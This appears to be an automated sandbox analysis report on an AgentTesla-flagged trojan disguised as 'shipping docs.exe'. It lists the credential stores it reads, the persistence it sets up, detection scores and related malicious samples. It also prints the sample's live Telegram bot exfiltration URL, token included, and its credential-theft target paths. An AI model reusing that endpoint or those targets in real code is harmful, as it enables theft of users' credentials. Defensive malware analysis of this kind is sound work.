                Source: C:\Users\user\Desktop\shipping docs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\shipping docs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\shipping docs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\shipping docs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara match | File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Source: Yara match | File source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Web Service
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job
                1
                Registry Run Keys / Startup Folder
                1
                Scheduled Task/Job
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth11
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)1
                Registry Run Keys / Startup Folder
                2
                Obfuscated Files or Information
                1
                Credentials in Registry
                1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
                Software Packing
                NTDS311
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer3
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                Process Injection
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                Hidden Files and Directories
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Behavior Graph ID: 756232 | Sample: shipping docs.exe | Startdate: 29/11/2022 | Architecture: WINDOWS | Score: 100
                Start node signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 11 other signatures
                Processes started from the start node: yVGAJfiVEvtg.exe (7), shipping docs.exe (10), VMqTMMD.exe (13), VMqTMMD.exe (15)
                yVGAJfiVEvtg.exe (7): Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; started yVGAJfiVEvtg.exe (17) and schtasks.exe (21)
                shipping docs.exe (10): dropped C:\Users\user\AppData\...\yVGAJfiVEvtg.exe (PE32), C:\Users\user\AppData\Local\...\tmp7934.tmp (XML), C:\Users\user\...\shipping docs.exe.log (ASCII); Injects a PE file into a foreign processes; started shipping docs.exe (23) and schtasks.exe (26)
                VMqTMMD.exe (13): started VMqTMMD.exe (28) and schtasks.exe (30)
                VMqTMMD.exe (15): Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                schtasks.exe (21): started conhost.exe (32)
                shipping docs.exe (23): api.telegram.org 149.154.167.220, 443, 49699, 49700 TELEGRAMRU United Kingdom; dropped C:\Users\user\AppData\Roaming\...\VMqTMMD.exe (PE32), C:\Users\user\...\VMqTMMD.exe:Zone.Identifier (ASCII); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier)
                schtasks.exe (26): started conhost.exe (34)
                VMqTMMD.exe (28): 192.168.2.1 unknown unknown; Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
                schtasks.exe (30): started conhost.exe (36)

                Source | Detection | Scanner | Label
                shipping docs.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                shipping docs.exe | 47% | Virustotal |
                shipping docs.exe | 100% | Joe Sandbox ML |
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | 100% | Joe Sandbox ML |
                C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | 73% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                Source | Detection | Scanner | Label
                3.0.shipping docs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                Source | Detection | Scanner | Label
                c-0001.c-msedge.net | 0% | Virustotal |
                Source | Detection | Scanner | Label
                http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                http://www.tiro.com | 0% | URL Reputation | safe
                http://www.goodfont.co.kr | 0% | URL Reputation | safe
                http://www.carterandcone.com | 0% | URL Reputation | safe
                http://www.sajatypeworks.com | 0% | URL Reputation | safe
                http://www.typography.netD | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                http://fontfabrik.com | 0% | URL Reputation | safe
                http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                http://www.fontbureau.comgrita | 0% | URL Reputation | safe
                http://www.s.$ | 0% | Avira URL Cloud | safe
                https://api.telegram.org4 | 0% | URL Reputation | safe
                https://api.telegram.org4 | 0% | URL Reputation | safe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
                http://www.sajatypeworks.comteP$ | 0% | Avira URL Cloud | safe
                http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                http://www.jiyu-kobo.co.jp/jp/O | 0% | URL Reputation | safe
                http://www.sandoll.co.kr | 0% | URL Reputation | safe
                http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                http://www.jiyu-kobo.co.jp/$ | 0% | URL Reputation | safe
                http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                http://www.sakkal.com | 0% | URL Reputation | safe
                http://www.jiyu-kobo.co.jp/Y | 0% | URL Reputation | safe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
                http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
                http://en.w | 0% | URL Reputation | safe
                https://JIQ1JKgQReGyOBe.com | 0% | Avira URL Cloud | safe
                http://www.jiyu-kobo.co.jp/= | 0% | URL Reputation | safe
                http://www.carterandcone.coml | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                http://www.fontbureau.comm | 0% | URL Reputation | safe
                http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                http://www.founder.com.cn/cnu-h | 0% | URL Reputation | safe
                http://www.fonts.com8 | 0% | URL Reputation | safe
                http://www.founder.com.cn/cn% | 0% | URL Reputation | safe
                http://www.sandoll.co.krT | 0% | Avira URL Cloud | safe
                http://www.sandoll.co.krigh | 0% | Avira URL Cloud | safe
                http://Unbjpy.com | 0% | Avira URL Cloud | safe
                http://www.fonts.comtteJ | 0% | Avira URL Cloud | safe
                http://www.founder.com.cn/cnlJ | 0% | Avira URL Cloud | safe
                http://www.jiyu-kobo.co.jp/ko | 0% | Avira URL Cloud | safe
                NameIPActiveMaliciousAntivirus DetectionReputation
                c-0001.c-msedge.net
                13.107.4.50
                truefalseunknown
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocumentfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
                                                    IP
                                                    192.168.2.1
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 756232
Start date and time: 2022-11-29 21:18:08 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 43s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: shipping docs.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/9@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 83
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 209.197.3.8
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Time | Type | Description
21:19:06 | API Interceptor | 602x Sleep call for process: shipping docs.exe modified
21:19:09 | Task Scheduler | Run new task: yVGAJfiVEvtg path: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
21:19:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
21:19:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VMqTMMD C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
21:19:28 | API Interceptor | 113x Sleep call for process: yVGAJfiVEvtg.exe modified
21:19:41 | API Interceptor | 193x Sleep call for process: VMqTMMD.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    149.154.167.220BL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                      scan Document_SA26844823746789e.PDF.htmlGet hashmaliciousBrowse
                                                        Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                                            AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                                                                IMG_2022028022-0120.vbsGet hashmaliciousBrowse
                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                                                    PO.exeGet hashmaliciousBrowse
                                                                      500 126.htmlGet hashmaliciousBrowse
                                                                        500 126.htmlGet hashmaliciousBrowse
                                                                          Carta de pago.exeGet hashmaliciousBrowse
                                                                            INVOICE SHIPPING-PACKING LIST.exeGet hashmaliciousBrowse
                                                                              FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                                                                                Rfq#Specification.exeGet hashmaliciousBrowse
                                                                                  SHIPPING INVOICE-PACKING LIST DOCS.exeGet hashmaliciousBrowse
                                                                                    IMG_202202811-0443.vbsGet hashmaliciousBrowse
                                                                                      hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                        DHLDOCUMENTS27011222.exeGet hashmaliciousBrowse
                                                                                          Halkbank.exeGet hashmaliciousBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            api.telegram.orgBL-SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.CrypterX-gen.23740.23288.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            scan Document_SA26844823746789e.PDF.htmlGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
                                                                                            AWB DHL 7214306201 Shipment.pdf (432).exeGet hashmaliciousBrowse
                                                                                            • 149.154.167.220
SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe | malicious | 149.154.167.220
IMG_2022028022-0120.vbs | malicious | 149.154.167.220
hesaphareketi-01.pdf.exe | malicious | 149.154.167.220
PO.exe | malicious | 149.154.167.220
500 126.html | malicious | 149.154.167.220
500 126.html | malicious | 149.154.167.220
Carta de pago.exe | malicious | 149.154.167.220
INVOICE SHIPPING-PACKING LIST.exe | malicious | 149.154.167.220
FedEx Express AWB#53053232097Receipt.exe | malicious | 149.154.167.220
Rfq#Specification.exe | malicious | 149.154.167.220
SHIPPING INVOICE-PACKING LIST DOCS.exe | malicious | 149.154.167.220
IMG_202202811-0443.vbs | malicious | 149.154.167.220
hesaphareketi-01.exe | malicious | 149.154.167.220
DHLDOCUMENTS27011222.exe | malicious | 149.154.167.220
Match: c-0001.c-msedge.net
OAeO1VtpMo.exe | malicious | 13.107.4.50
SecuriteInfo.com.Win32.CrypterX-gen.12191.6105.exe | malicious | 13.107.4.50
http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2 | malicious | 13.107.4.50
MACHINE SPECIFICATIONS.exe | malicious | 13.107.4.50
Iwutiwno.dll.dll | malicious | 13.107.4.50
kW1RcHd3Np.exe | malicious | 13.107.4.50
Urgent quote request -pdf-.exe | malicious | 13.107.4.50
094089010-094098574-1669343495-1669343493-2332.html | malicious | 13.107.4.50
LhLntDLA0i.exe | malicious | 13.107.4.50
stGLUBW7kG.exe | malicious | 13.107.4.50
file.exe | malicious | 13.107.4.50
I8Kmld8K8U.exe | malicious | 13.107.4.50
CamScanner-397841.exe | malicious | 13.107.4.50
UPDATED SOA (2).exe | malicious | 13.107.4.50
2022#U5e74#U4e2a#U4eba#U52b3#U52a8#U8865#U8d34.docx.doc | malicious | 13.107.4.50
REMITTANCE COPY.exe | malicious | 13.107.4.50
TNT Invoice_pdf.exe | malicious | 13.107.4.50
n2cFuTcuzL.exe | malicious | 13.107.4.50
file.exe | malicious | 13.107.4.50
SecuriteInfo.com.Trojan.PackedNET.1617.17943.11881.exe | malicious | 13.107.4.50
Associated Sample Name / URL | Detection | Context
Match: TELEGRAM
RUXJXuWlR8TZ.exe | malicious | 149.154.167.99
BL-SHIPPING DOCUMENTS.exe | malicious | 149.154.167.220
7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe | malicious | 149.154.167.99
file.exe | malicious | 149.154.167.99
c7oqCiKzbF.exe | malicious | 149.154.167.99
SecuriteInfo.com.Win32.PWSX-gen.9296.19888.exe | malicious | 149.154.167.99
scan Document_SA26844823746789e.PDF.html | malicious | 149.154.167.220
Ziraat-bankasiSwiftMessaji2911202245344.exe | malicious | 149.154.167.220
SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe | malicious | 149.154.167.220
AWB DHL 7214306201 Shipment.pdf (432).exe | malicious | 149.154.167.220
SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe | malicious | 149.154.167.220
synapse3.zip | malicious | 149.154.167.99
00000000.exe | malicious | 149.154.167.99
IMG_2022028022-0120.vbs | malicious | 149.154.167.220
hesaphareketi-01.pdf.exe | malicious | 149.154.167.220
PO.exe | malicious | 149.154.167.220
500 126.html | malicious | 149.154.167.220
500 126.html | malicious | 149.154.167.220
Carta de pago.exe | malicious | 149.154.167.220
SyyMuhzBJ3.exe | malicious | 149.154.167.99
Associated Sample Name / URL | Detection | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
BL-SHIPPING DOCUMENTS.exe | malicious | 149.154.167.220
cryptor.bin.exe | malicious | 149.154.167.220
SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe | malicious | 149.154.167.220
SIEM_PO00938467648.vbs | malicious | 149.154.167.220
SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | malicious | 149.154.167.220
SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | malicious | 149.154.167.220
SHIPMENT DOCUMENTS.exe | malicious | 149.154.167.220
file.exe | malicious | 149.154.167.220
SkyNet.1448.exe | malicious | 149.154.167.220
SkyNet.1448.exe | malicious | 149.154.167.220
solicitud de presupuesto 29-11-2022.exe | malicious | 149.154.167.220
library.dll | malicious | 149.154.167.220
MACHINE SPECIFICATIONS.exe | malicious | 149.154.167.220
SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe | malicious | 149.154.167.220
MEPS-42.exe | malicious | 149.154.167.220
11-29-22.exe | malicious | 149.154.167.220
ORDER.exe | malicious | 149.154.167.220
SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe | malicious | 149.154.167.220
Quotation.exe | malicious | 149.154.167.220
Ziraat-bankasiSwiftMessaji2911202245344.exe | malicious | 149.154.167.220
                                                                                            No context

Process: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process: C:\Users\user\Desktop\shipping docs.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: false
